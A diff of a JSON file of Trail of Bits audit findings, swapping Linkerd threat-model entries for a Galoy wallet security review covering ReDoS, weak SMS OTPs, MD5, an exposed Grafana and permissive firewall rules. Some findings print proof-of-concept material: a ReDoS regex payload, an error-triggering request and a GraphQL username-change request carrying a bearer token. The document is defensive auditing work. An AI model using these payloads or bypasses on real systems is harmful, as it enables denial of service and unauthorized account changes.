Figure 6.1: In this proof-of-concept CSRF attack, the malicious website sends a request (the btcPriceList query) when the victim clicks Submit request. Recommendations Short term, disallow the use of the GET method to send queries, or enhance the CSRF protections for GET requests. Long term, identify all state-changing endpoints and ensure that they are protected by an authentication or anti-CSRF mechanism. Then implement tests for those endpoints. References Cross-Origin Resource Sharing, Mozilla documentation Cross-Site Request Forgery Prevention, OWASP Cheat Sheet Series", "labels": [ "Trail of Bits", "Severity: Low", @@ -2902,9 +5650,9 @@ ] }, { - "title": "7. Prometheus endpoints reachable from the user application namespace ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. Metrics can include various labels with IP addresses, pod IDs, and port numbers. Threat Scenario An attacker gains access to a user application pod and calls the API directly to read Prometheus metrics. He uses the API to gain information about the cluster that aids him in expanding his access across the Kubernetes infrastructure. Recommendations Short term, disallow access to the Prometheus extension from the user application namespace. This could be done in the same manner in which access to the web dashboard is restricted from within the cluster (e.g., by allowing access only for specic hosts). 39 Linkerd Threat Model", + "title": "7. Potential ReDoS risk ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The caseInsensitiveRegex function takes an input: string parameter and uses it to create a new RegExp object (gure 7.1). Users cannot currently control the input parameter (the regular expression) or the string; however, if users gain that ability as the code is developed, it may enable them to cause a regular expression denial of service (ReDoS) . 13 14 export const caseInsensitiveRegex = (input: string ) => { return new RegExp ( `^ ${ input } $` , \"i\" ) 15 } Figure 7.1: src/services/mongoose/users.ts#1315 37 const findByUsername = async ( 38 username: Username , 39 ): Promise => { 40 41 try { const result = await User.findOne( 42 { username: caseInsensitiveRegex (username) }, Figure 7.2: src/services/mongoose/accounts.ts#3742 Exploit Scenario An attacker registers an account with a specially crafted username (line 2, gure 7.3), which forms part of a regex. The attacker then nds a way to pass the malicious regex (line 1, gure 7.3) to the findByUsername function, causing a denial of service on a victims machine. 1 2 let test = caseInsensitiveRegex( \"(.*){1,32000}[bc]\" ) let s = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!\" 3 s.match(test) Figure 7.3: A proof of concept for the ReDoS vulnerability Recommendations Short term, ensure that input passed to the caseInsensitiveRegex function is properly validated and sanitized.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2912,9 +5660,9 @@ ] }, { - "title": "8. Lack of egress access controls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "Linkerd provides access control mechanisms for ingress trac but not for egress trac. Egress controls would allow an operator to impose important restrictions, such as which external services and endpoints that a meshed application running in the application namespace can communicate with. Threat Scenario A user application becomes compromised. As a result, the application code begins making outbound requests to malicious endpoints. The lack of access controls on egress trac prevents infrastructure operators from mitigating the situation (e.g., by allowing the application to communicate with only a set of allowlisted external services). Recommendations Short term, add support for enforcing egress network policies. A GitHub issue to implement this recommendation already exists in the Linkerd repository. 40 Linkerd Threat Model", + "title": "8. Use of MD5 to generate unique GeeTest identiers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy application uses MD5 hashing to generate a unique identier during GeeTest service registration. MD5 is an insecure hash function and should never be used in a security-relevant context. 33 const register = async (): Promise => { 34 35 36 37 try { const gtLib = new GeetestLib(config.id, config.key) const digestmod = \"md5\" const params = { 38 digestmod, 39 client_type: \"native\" , 40 } 41 42 43 const bypasscache = await getBypassStatus() // not a cache let result if (bypasscache === \"success\" ) { 44 result = await gtLib.register(digestmod, params) Figure 8.1: src/services/geetest.ts#3344 Recommendations Short term, change the hash function used in the register function to a stronger algorithm that will not cause collisions, such as SHA-256. Long term, document all cryptographic algorithms used in the system, implement a policy governing their use, and create a plan for when and how to deprecate them.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2922,9 +5670,9 @@ ] }, { - "title": "9. Prometheus endpoints are unencrypted and unauthenticated by default ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. However, this endpoint is unencrypted and unauthenticated, lacking access and condentiality controls entirely. Threat Scenario An attacker gains access to a sibling component within the same namespace in which the Prometheus endpoint exists. Due to the lack of access controls, the attacker can now laterally obtain Prometheus metrics with ease. Additionally, due to the lack of condentiality controls, such as those implemented through the use of cryptography, connections are exposed to other parties. Recommendations Short term, consider implementing access controls within Prometheus and Kubernetes to disallow access to the Prometheus metrics endpoint from any machine within the cluster that is irrelevant to Prometheus logging. Additionally, implement secure encryption of connections with the use of TLS within Prometheus or leverage existing Linkerd mTLS schemes. 41 Linkerd Threat Model", + "title": "9. Reliance on SMS-based OTPs for authentication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Galoys authentication process is heavily reliant on the delivery of one-time passwords (OTPs) over SMS. This authentication method contravenes best practices and should not be used in applications that handle nancial transactions or other sensitive operations. SMS-based OTP leaves users vulnerable to multiple attacks and is considered an unsafe authentication method. Several of the most common and eective attack scenarios are described below. Text messages received by a mobile device can be intercepted by rogue applications on the device. Many users blindly authorize untrusted third-party applications to access their mobile phones SMS databases; this means that a vulnerability in a third-party application could lead to the compromise and disclosure of the text messages on the device, including Galoys SMS OTP messages. Another common technique used to target mobile nance applications is the interception of notications on a device. Android operating systems, for instance, broadcast notications across applications by design; a rogue application could subscribe to those notications to access incoming text message notications. Attackers also target SMS-based two-factor authentication and OTP implementations through SIM swapping . In short, an attacker uses social engineering to gather information about the owner of a SIM card and then, impersonating its owner, requests a new SIM card from the telecom company. All calls and text messages will then be sent to the attacker, leaving the original owner of the number out of the loop. This approach has been used in many recent attacks against crypto wallet owners, leading to millions of dollars in losses. Recommendations Short term, avoid using SMS authentication as anything other than an optional way to validate an account holder's identity and prole information. Instead of SMS-based OTP, provide support for hardware-based two-factor authentication methods such as Yubikey tokens, or software-based time-based one-time password (TOTP) implementations such as Google Authenticator and Authy. References What is a Sim Swap? Denition and Related FAQs, Yubico", "labels": [ "Trail of Bits", "Severity: Medium", @@ -2932,9 +5680,9 @@ ] }, { - "title": "10. Shared identity and destination services in a cluster poses risks to multi-application clusters ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The identity and destination controllers are meant to convey certicate and routing information for proxies, respectively. However, only one identity controller and one destination controller are deployed in a cluster, so they are shared among all application pods within a cluster. As a result, a single application pod could pollute records, causing denial-of-service attacks or otherwise compromising these cluster-wide components. Additionally, a compromise of these cluster-wide components may result in the exposure of routing information for each application pod. Although the Kubernetes API server is exposed with the same architecture, it may be benecial to minimize the attack surface area and the data that can be exltrated from compromised Linkerd components. Threat Scenario An attacker gains access to a single user application pod and begins to launch attacks against the identity and destination services. As a result, these services cannot serve other user application pods. The attacker later nds a way to compromise one of these two services, allowing her to leak sensitive application trac from other user application pods. Recommendations Short term, implement per-pod identity and destination services that are isolated from other pods. If this is not viable, consider documenting this caveat so that users are aware of the risks of hosting multiple applications within a single cluster. 42 Linkerd Threat Model", + "title": "10. Incorrect handling and implementation of SMS OTPs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Users authenticate to the web panel by providing OTPs sent to them over SMS. We identied two issues in the OTP authentication implementation: 1. The generated OTPs are persistent because OTP expiration dates are calculated incorrectly. The Date.now() method returns the epoch time in milliseconds, whereas it is meant to return the time in seconds. 294 const PhoneCodeSchema = new Schema({ 295 created_at: { 296 297 type : Date , default: Date.now , 298 required: true , Figure 10.1: The default date value is expressed in milliseconds. ( src/services/mongoose/schema.ts#294298 ) 11 export const VALIDITY_TIME_CODE = ( 20 * 60 ) as Seconds Figure 10.2: The default validity period is expressed in seconds. ( src/config/index.ts#11 ) 49 50 51 const age = VALIDITY_TIME_CODE const validCode = await isCodeValid({ phone: phoneNumberValid , code, age }) if (validCode instanceof Error ) return validCode Figure 10.3: Validation of an OTPs age ( src/app/users/login.ts#4951 ) 18 }): Promise < true | RepositoryError> => { 19 20 21 const timestamp = Date .now() / 1000 - age try { const phoneCode = await PhoneCode.findOne({ 22 phone, 23 code, 24 created_at: { 25 $gte: timestamp , 26 }, Figure 10.4: The codebase validates the timestamp in seconds, while the default date is in milliseconds, as shown in gure 10.1. ( src/services/mongoose/phone-code.ts#1826 ) 2. The SMS OTPs are never discarded. When a new OTP is sent to a user, the old one remains valid regardless of its expiration time. A users existing OTP tokens also remain valid if the user manually logs out of a session, which should not be the case. Tests of the admin-panel and web-wallet code conrmed that all SMS OTPs generated for a given phone number remain valid in these cases. Exploit Scenario After executing a successful phishing attack against a user, an attacker is able to intercept an OTP sent to that user, gaining persistent access to the victim's account. The attacker will be able to use the code even when the victim logs out of the session or requests a new OTP. Recommendations Short term, limit the lifetime of OTPs to two minutes. Additionally, immediately invalidate an OTP, even an unexpired one, when any of the following events occur: The user logs out of a session The user requests a new OTP The OTP is used successfully The OTP reaches its expiration time The users account is locked for any reason (e.g., too many login attempts) References NIST best practices for implementing authentication tokens", "labels": [ "Trail of Bits", "Severity: High", @@ -2942,9 +5690,9 @@ ] }, { - "title": "11. Lack of isolation between components and their sidecar proxies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "Within the Linkerd, linkerd-viz, and user application namespaces, each core component lives alongside a linkerd-proxy container, which proxies the components trac and provides mTLS for internal connections. However, because the sidecar proxies are not isolated from their corresponding components, the compromise of a component would mean the compromise of its proxy, and vice versa. This is particularly interesting when considering the lack of access controls for some components, as detailed in TOB-LKDTM-4: proxy admin endpoints are exposed to the applications they are proxying, allowing metrics collection and shutdown requests to be made. Threat Scenario An attacker exploits a vulnerability to gain access to a linkerd-proxy instance. As a result, the attacker is able to compromise the condentiality, integrity, and availability of lateral components, such as user applications, identity and destination services within the Linkerd namespace, and extensions within the linkerd-proxy namespace. Recommendations Short term, document system caveats and sensitivities so that operators are aware of them and can better defend themselves against attacks. Consider employing health checks that verify the integrity of proxies and other components to ensure that they have not been compromised. Long term, investigate ways to isolate sidecar proxies from the components they are proxying (e.g., by setting stricter access controls or leveraging isolated namespaces between proxied components and their sidecars). 43 Linkerd Threat Model", + "title": "11. Vulnerable and outdated Node packages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "We used the yarn audit and snyk tools to audit the project dependencies and components for known vulnerabilities and outdated versions, respectively. The project uses many outdated packages with known security vulnerabilities ranging from critical to low severity. A list of vulnerable and outdated packages is included in appendix C . Vulnerabilities in packages imported by an application are not necessarily exploitable. In most cases, an aected method in a vulnerable package needs to be used in the right context to be exploitable. We manually reviewed the packages with high- or critical-severity vulnerabilities and did not nd any vulnerabilities that could be exploited in the Galoy application. However, that could change as the code is further developed. Exploit Scenario An attacker ngerprints one of Galoys components, identies an out-of-date package with a known vulnerability, and uses it in an exploit against the component. Recommendations Short term, update the outdated and vulnerable dependencies. Long term, integrate static analysis tools that can detect outdated and vulnerable libraries (such as the yarn audit and snyk tools) into the build and / or test pipeline. This will improve the system's security posture and help prevent the exploitation of project dependencies.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -2952,9 +5700,9 @@ ] }, { - "title": "12. Lack of centralized security best practices documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "While security recommendations are included throughout Linkerds technical guidance documents, there is no centralized guidance on security best practices. Furthermore, the documentation on securing clusters lacks guidance on security best practices such as conguring timeouts and retries, authorization policy recommendations for defense in depth, and locking down access to linkerd-viz components. Threat Scenario A user is unaware of security best practices and congures Linkerd in an insecure manner. As a result, her Linkerd infrastructure is prone to attacks that could compromise the condentiality, integrity, and availability of data handled by the cluster. Recommendations Short term, develop centralized documentation on security recommendations with a focus on security-in-depth practices for users to follow. This guidance should be easy to locate should any user wish to follow security best practices when using Linkerd. 44 Linkerd Threat Model 13. Unclear distinction between Linkerd and Linkerd2 in o\u0000cial Linkerd blog post guidance Severity: Informational Diculty: Informational Type: Awareness and Training Finding ID: TOB-LKDTM-13 Target: Linkerd", + "title": "12. Outdated and internet-exposed Grafana instance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Grafana admin panel is exposed over the internet. A management interface should not be exposed over the internet unless it is protected by a secondary authentication or access control mechanism; these mechanisms (e.g., IP address restrictions and VPN solutions) can mitigate the immediate risk to an application if it experiences a vulnerability. Moreover, the Grafana version deployed at grafana.freecorn.galoy.io is outdated and vulnerable to known security issues. Figure 12.1: The outdated Grafana version (8.2.1) with known security issues The version banner on the login page (gure 12.1) identies the version as v8.2.1 ( 88622d7f09 ). This version has multiple moderate- and high-risk vulnerabilities. One of them, a path traversal vulnerability ( CVE-2021-43798 ), could enable an unauthenticated attacker to read the contents of arbitrary les on the server. However, we could not exploit this issue, and the Galoy team suggested that the code might have been patched through an upstream software deployment. Time constraints prevented us from reviewing all Grafana instances for potential vulnerabilities. We reviewed only the grafana.freecorn.galoy.io instance, but the recommendations in this nding apply to all deployed instances. Exploit Scenario An attacker identies the name of a valid plugin installed and active on the instance. By using a specially crafted URL, the attacker can read the contents of any le on the server (as long as the Grafana process has permission to access the le). This enables the attacker to read sensitive conguration les and to engage in remote command execution on the server. Recommendations Short term, avoid exposing any Grafana instance over the internet, and restrict access to each instances management interface. This will make the remote exploitation of any issues much more challenging. Long term, to avoid known security issues, review all deployed instances and ensure that they have been updated to the latest version. Additionally, review the Grafana log les for any indication of the attack described in CVE-2021-43798, which has been exploited in the wild. References List of publicly known vulnerabilities aecting recent versions of Grafana", "labels": [ "Trail of Bits", "Severity: High", @@ -2962,9 +5710,9 @@ ] }, { - "title": "3. CLI tool allows the use of insecure protocols when externally sourcing infrastructure denitions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "When using the command-line interface (CLI) tool, an operator may source infrastructural YAML denitions from a URI path specifying any protocol, such as http:// or https://. Therefore, a user could expose sensitive information when using an insecure protocol such as HTTP. Furthermore, the Linkerd documentation does not warn users about the systems use of insecure protocols. Threat Scenario An infrastructure operator integrates Linkerd into her infrastructure. When doing so, she uses the CLI tool to fetch YAML denitions over HTTP. Unbeknownst to her, the use of HTTP has made her data visible to attackers on the local network. Her data is also prone to man-in-the-middle attacks. Recommendations Short term, disallow the use of insecure protocols within the CLI tool when sourcing external data. Alternatively, provide documentation and best practices regarding the use of insecure protocols when externally sourcing data within the CLI tool. 35 Linkerd Threat Model", + "title": "13. Incorrect processing of GET path parameter ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "If the value of the hidden path parameter in the GET request in gure 13.1 does not match the value in the appRoutesDef array, the request will cause an unhandled error (gure 13.2). The error occurs when the result of the serverRenderer function is undefined (line 21, gure 13.3), because the Invalid route path error is thrown in the call to the renderToStringWithData function (gure 13.4). GET / ?path=aaaa HTTP / 1.1 Host: localhost:3000 Figure 13.1: The HTTP request that triggers the error HTTP / 1.1 500 Internal Server Error // (...) ReferenceError: /Users/md/work/web-wallet/views/index.ejs:8 6| 7| >> 8| <%- pageData.title %> 9| 10| /colors.css\" /> 11| \" /> pageData is not defined at eval (\"web-wallet/views/index.ejs\":12:17) at index (web-wallet/node_modules/ejs/lib/ejs.js:692:17) at tryHandleCache (web-wallet/node_modules/ejs/lib/ejs.js:272:36) at View.exports.renderFile [as engine] (web-wallet/node_modules/ejs/lib/ejs.js:489:10) at View.render (web-wallet/node_modules/express/lib/view.js:135:8) at tryRender (web-wallet/node_modules/express/lib/application.js:640:10) at Function.render (web-wallet/node_modules/express/lib/application.js:592:3) at ServerResponse.render (web-wallet/node_modules/express/lib/response.js:1017:7) at web-wallet/src/server/ssr-router.ts:24:18 Figure 13.2: The HTTP response that shows the unhandled error 21 22 23 24 const vars = await serverRenderer(req)({ // undefined path: checkedRoutePath , }) return res.render( \"index\" , vars) // call when the vars is undefined Figure 13.3: src/server/ssr-router.ts#2124 10 export const serverRenderer = 11 (req: Request ) => 12 async ({ 13 path, 14 flowData, 15 }: { 16 path: RoutePath | AuthRoutePath 17 flowData?: KratosFlowData 18 }) => { 19 try { // (...) 43 const initialMarkup = await renderToStringWithData(App) // (...) 79 }) 80 } catch (err) { 81 console.error(err) 82 } Figure 13.4: src/renderers/server.tsx#1082 Exploit Scenario An attacker nds a way to inject malicious code into the hidden path parameter. This results in an open redirect vulnerability, enabling the attacker to redirect a victim to a malicious website. Recommendations Short term, ensure that errors caused by an invalid path parameter value (one not included in the appRoutesDef whitelist) are handled correctly. A path parameter should not be processed if it is unused. Long term, use Burp Suite Professional with the Param Miner extension to scan the application for hidden parameters.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2972,9 +5720,9 @@ ] }, { - "title": "4. Exposure of admin endpoint may a\u0000ect application availability ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "User application sidecar proxies expose an admin endpoint that can be used for tasks such as shutting down the proxy server and collecting metrics. This endpoint is exposed to other components within the same pod. Therefore, an internal attacker could shut down the proxy, aecting the user applications availability. Furthermore, the admin endpoint lacks access controls, and the documentation does not warn of the risks of exposing the admin endpoint over the internet. Threat Scenario An infrastructure operator integrates Linkerd into his Kubernetes cluster. After a new user application is deployed, an underlying component within the same pod is compromised. An attacker with access to the compromised component can now laterally send a request to the admin endpoint used to shut down the proxy server, resulting in a denial of service of the user application. Recommendations Short term, employ authentication and authorization mechanisms behind the admin endpoint for proxy servers. Long term, document the risks of exposing critical components throughout Linkerd. For instance, it is important to note that exposing the admin endpoint on a user application proxy server may result in the exposure of a shutdown method, which could be leveraged in a denial-of-service attack. 36 Linkerd Threat Model", + "title": "14. Discrepancies in API and GUI access controls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Although the Web Wallets graphical user interface (GUI) does not allow changes to a username (gure 14.1), they can be made through the GraphQL userUpdateUsername mutation (gure 14.2). Figure 14.1: The lock icon on the Settings page indicates that it is not possible to change a username. POST /graphql HTTP / 2 Host: api.freecorn.galoy.io Content-Length: 345 Content-Type: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiI2MjI3ODYwMWJlOGViYWYxZWRmNDBhNDYiLCJ uZXR3b3JrIjoibWFpbm5ldCIsImlhdCI6MTY0Njc1NzU4NX0.ed2dk9gMQh5DJXCPpitj5wq78n0gFnmulRp 2KIXTVX0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Origin: https://wallet.freecorn.galoy.io { \"operationName\" : \"userUpdateUsername\" , \"variables\" :{ \"input\" :{ \"username\" : \"aaaaaaaaaaaa aaa\" }}, \"query\" : \" mutation userUpdateUsername($input: UserUpdateUsernameInput!) {\\n userUpdateUsername(input: $input) {\\n errors {\\n message\\n __typename\\n }\\n user {\\n id\\n username\\n __typename\\n }\\n __typename\\n }\\n} \" } HTTP/ 2 200 OK // (...) { \"data\" :{ \"userUpdateUsername\" :{ \"errors\" :[], \"user\" :{ \"id\" : \"04f01fb4-6328-5982-a39a-eeb 027a2ceef\" , \"username\" : \"aaaaaaaaaaaaaaa\" , \"__typename\" : \"User\" }, \"__typename\" : \"UserUpdat eUsernamePayload\" }}} Figure 14.2: The HTTP request-response cycle that enables username changes Exploit Scenario An attacker nds a discrepancy in the access controls of the GUI and API and is then able to use a sensitive method that the attacker should not be able to access. Recommendations Short term, avoid relying on client-side access controls. If the business logic of a functionality needs to be blocked, the block should be enforced in the server-side code. Long term, create an access control matrix for specic roles in the application and implement unit tests to ensure that appropriate access controls are enforced server-side.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2982,9 +5730,9 @@ ] }, { - "title": "12. Lack of centralized security best practices documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "While security recommendations are included throughout Linkerds technical guidance documents, there is no centralized guidance on security best practices. Furthermore, the documentation on securing clusters lacks guidance on security best practices such as conguring timeouts and retries, authorization policy recommendations for defense in depth, and locking down access to linkerd-viz components. Threat Scenario A user is unaware of security best practices and congures Linkerd in an insecure manner. As a result, her Linkerd infrastructure is prone to attacks that could compromise the condentiality, integrity, and availability of data handled by the cluster. Recommendations Short term, develop centralized documentation on security recommendations with a focus on security-in-depth practices for users to follow. This guidance should be easy to locate should any user wish to follow security best practices when using Linkerd. 44 Linkerd Threat Model", + "title": "15. Cloud SQL does not require TLS connections ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Terraforms declarative conguration le for the Cloud SQL instance does not indicate that PostgreSQL should enforce the use of Transport Layer Security (TLS) connections. Similarly, the Galoy solution does not use the Cloud SQL Auth proxy, which provides strong encryption and authentication using identity and access management. Because the database is exposed only in a virtual private cloud (VPC) network, this nding is of low severity. Exploit Scenario An attacker manages to eavesdrop on trac in the VPC network. If one of the database clients is miscongured, the attacker will be able to observe the database trac in plaintext. Recommendations Short term, congure Cloud SQL to require the use of TLS, or use the Cloud SQL Auth proxy. Long term, integrate Terrascan or another automated analysis tool into the workow to detect areas of improvement in the solution. References Congure SSL/TLS certicates , Cloud SQL documentation Connect from Google Kubernetes Engine , Cloud SQL documentation", "labels": [ "Trail of Bits", "Severity: Low", @@ -2992,9 +5740,9 @@ ] }, { - "title": "13. Unclear distinction between Linkerd and Linkerd2 in o\u0000cial Linkerd blog post guidance ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The ocial Linkerd documentation clearly indicates the version of Linkerd that each document pertains to. For instance, documentation specic to Linkerd 1.x displays a message stating, This is not the latest version of Linkerd! However, guidance documented in blog post form on the same site does not provide such information. For instance, the rst result of a Google search for Linkerd RBAC is a Linkerd blog post with guidance that is applicable only to linkerd 1.x, but there is no indication of this fact on the page. As a result, users who rely on these blog posts may misunderstand functionality in Linkerd versions 2.x and above. Threat Scenario A user searches for guidance on implementing various Linkerd features and nds documentation in blog posts that applies only to Linkerd version 1.x. As a result, he misunderstands Linkerd and its threat model, and he makes conguration mistakes that lead to security issues. Recommendations Short term, on Linkerd blog post pages, add indicators similar to the UI elements used in the Linkerd documentation to clearly indicate which version each guidance page applies to. 45 Linkerd Threat Model", + "title": "16. Kubernetes node pools are not congured to auto-upgrade ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy application uses Google Kubernetes Engine (GKE) node pools in which the auto-upgrade functionality is disabled. The auto-upgrade functionality helps keep the nodes in a Kubernetes cluster up to date with the Kubernetes version running on the cluster control plane, which Google updates on the users behalf. Auto-upgrades also ensure that security updates are timely applied. Disabling this setting is not recommended by Google and could create a security risk if patching is not performed manually. 124 125 126 management { auto_repair = true auto_upgrade = false 127 } Figure 16.1: The auto-upgrade property is set to false . ( modules/platform/gcp/kube.tf#124127 ) Recommendations Short term, enable the auto-upgrade functionality to ensure that the nodes are kept up to date and that security patches are timely applied. Long term, remain up to date on the security features oered by Google Cloud. Integrate Terrascan or another automated tool into the development workow to detect areas of improvement in the solution. References Auto-upgrading nodes , GKE documentation", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3002,9 +5750,9 @@ ] }, { - "title": "14. Insu\u0000cient logging of outbound HTTPS calls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "Linkerd operators can use the linkerd-viz extensions such as Prometheus and Grafana to collect metrics for the various proxies in a Linkerd infrastructure. However, these extensions do not collect metrics on outbound calls made by meshed applications. This limits the data that operators could use to conduct incident response procedures if compromised applications reach out to malicious external services and servers. Threat Scenario A meshed application running in the data plane is compromised as a result of a supply chain attack. Because outbound HTTPS calls are not logged, Linkerd operators are unable to collect sucient data to determine the impact of the vulnerability. Recommendations Short term, implement logging for outbound HTTPS connections. A GitHub issue to implement this recommendation already exists in the Linkerd repository but is still unresolved as of this writing. 46 Linkerd Threat Model A. Methodology A threat modeling assessment is intended to provide a detailed analysis of the risks that an application faces at the structural and operational level; the goal is to assess the security of the applications design rather than its implementation details. During these assessments, engineers rely heavily on frequent meetings with the clients developers and on extensive reading of all documentation provided by the client. Code review and dynamic testing are not part of the threat modeling process, although engineers may occasionally consult the codebase or a live instance of the project to verify assumptions about the systems design. Engineers begin a threat modeling assessment by identifying the safeguards and guarantees that are critical to maintaining the target systems condentiality, integrity, and availability. These security controls dictate the assessments overarching scope and are determined by the requirements of the target system, which may relate to technical and reputational concerns, legal liability, and regulatory compliance. With these security controls in mind, engineers then divide the system into logical componentsdiscrete elements that perform specic tasksand establish trust zones around groups of components that lie within a common trust boundary. They identify the types of data handled by the system, enumerating the points at which data is sent, received, or stored by each component, as well as within and across trust boundaries. After establishing a detailed map of the target systems structure and data ows, engineers then identify threat actorsanyone who might threaten the targets security, including both malicious external actors and naive internal actors. Based on each threat actors initial privileges and knowledge, engineers then trace threat actor paths through the system, determining the controls and data that a threat actor might be able to improperly access, as well as the safeguards that prevent such access. Any viable attack path discovered during this process constitutes a nding, which is paired with design recommendations to remediate gaps in the systems defenses. Finally, engineers rate the strength of each security control, indicating the general robustness of that type of defense against the full spectrum of possible attacks. These ratings are provided in the Security Control Maturity Evaluation table. 47 Linkerd Threat Model B. Security Controls and Rating Criteria The following tables describe the security controls and rating criteria used in this report. Security Controls Category", + "title": "17. Overly permissive rewall rules ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The VPC rewall conguration is overly permissive. This conguration, in conjunction with Google Clouds default VPC rules, allows most communication between pods (gure 17.2), the bastion host (gure 17.3), and the public internet (gure 17.1). 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 resource \"google_compute_firewall\" \"bastion_allow_all_inbound\" { project = local.project name = \"${local.name_prefix}-bastion-allow-ingress\" network = google_compute_network.vpc.self_link target_tags = [ local.tag ] direction = \"INGRESS\" source_ranges = [ \"0.0.0.0/0\" ] priority = \"1000\" allow { protocol = \"all\" } 107 } Figure 17.1: The bastion ingress rules allow incoming trac on all protocols and ports from all addresses. ( modules/inception/gcp/bastion.tf#92107 ) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 resource \"google_compute_firewall\" \"intra_egress\" { project = local.project name = \"${local.name_prefix}-intra-cluster-egress\" description = \"Allow pods to communicate with each other and the master\" network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"EGRESS\" target_tags = [ local.cluster_name ] destination_ranges = [ local.master_ipv4_cidr_block , google_compute_subnetwork.cluster.ip_cidr_range , google_compute_subnetwork.cluster.secondary_ip_range[0].ip_cidr_range , ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } allow { protocol = \"ah\" } 23 } Figure 17.2: Pods can initiate connections to other pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#123 ) 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 resource \"google_compute_firewall\" \"dmz_nodes_ingress\" { name = \"${var.name_prefix}-bastion-nodes-ingress\" description = \"Allow ${var.name_prefix}-bastion to reach nodes\" project = local.project network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"INGRESS\" target_tags = [ local.cluster_name ] source_ranges = [ data.google_compute_subnetwork.dmz.ip_cidr_range , ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } 63 allow { protocol = \"ah\" } 64 } Figure 17.3: The bastion host can initiate connections to pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#4464 ) Exploit Scenario 1 An attacker gains access to a pod through a vulnerability in an application. He takes advantage of the unrestricted egress trac and miscongured pods to launch attacks against other services and pods in the network. Exploit Scenario 2 An attacker discovers a vulnerability on the Secure Shell server running on the bastion host. She exploits the vulnerability to gain network access to the Kubernetes cluster, which she can then use in additional attacks. Recommendations Short term, restrict both egress and ingress trac to necessary protocols and ports. Document the expected network interactions across the components and check them against the implemented rewall rules. Long term, use services such as the Identity-Aware Proxy to avoid exposing hosts directly to the internet, and enable VPC Flow Logs for network monitoring. Additionally, integrate automated analysis tools such as tfsec into the development workow to detect rewall issues early on. References Using IAP for TCP forwarding, Identity-Aware Proxy documentation", "labels": [ "Trail of Bits", "Severity: Medium", @@ -3012,9 +5760,9 @@ ] }, { - "title": "1. Risk of a race condition in the secondary plugins setup function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "When it fails to transfer a zone from another server, the setup function of the secondary plugin prints a message to standard output. It obtains the name of the zone, stored in the variable n , from a loop and prints the message in an anonymous inner goroutine. However, the variable is not copied before being used in the anonymous goroutine, and the value that n points to is likely to change by the time the scheduler executes the goroutine. Consequently, the value of n will be inaccurate when it is printed. 19 24 26 27 29 30 31 32 35 36 40 func setup(c *caddy.Controller) error { // (...). for _, n := range zones.Names { // (...) c.OnStartup( func () error { z.StartupOnce.Do( func () { go func () { // (...) for { // (...) log.Warningf( \"All '%s' masters failed to transfer, retrying in %s: %s\" , n , dur.String(), err) // (...) 41 46 47 48 49 50 51 52 53 } } } z.Update() }() }) return nil }) Figure 1.1: The value of n is not copied before it is used in the anonymous goroutine and could be logged incorrectly. ( plugin/secondary/setup.go#L19-L53 ) Exploit Scenario An operator of a CoreDNS server enables the secondary plugin. The operator sees an error in the standard output indicating that the zone transfer failed. However, the error points to an invalid zone, making it more dicult for the operator to troubleshoot and x the 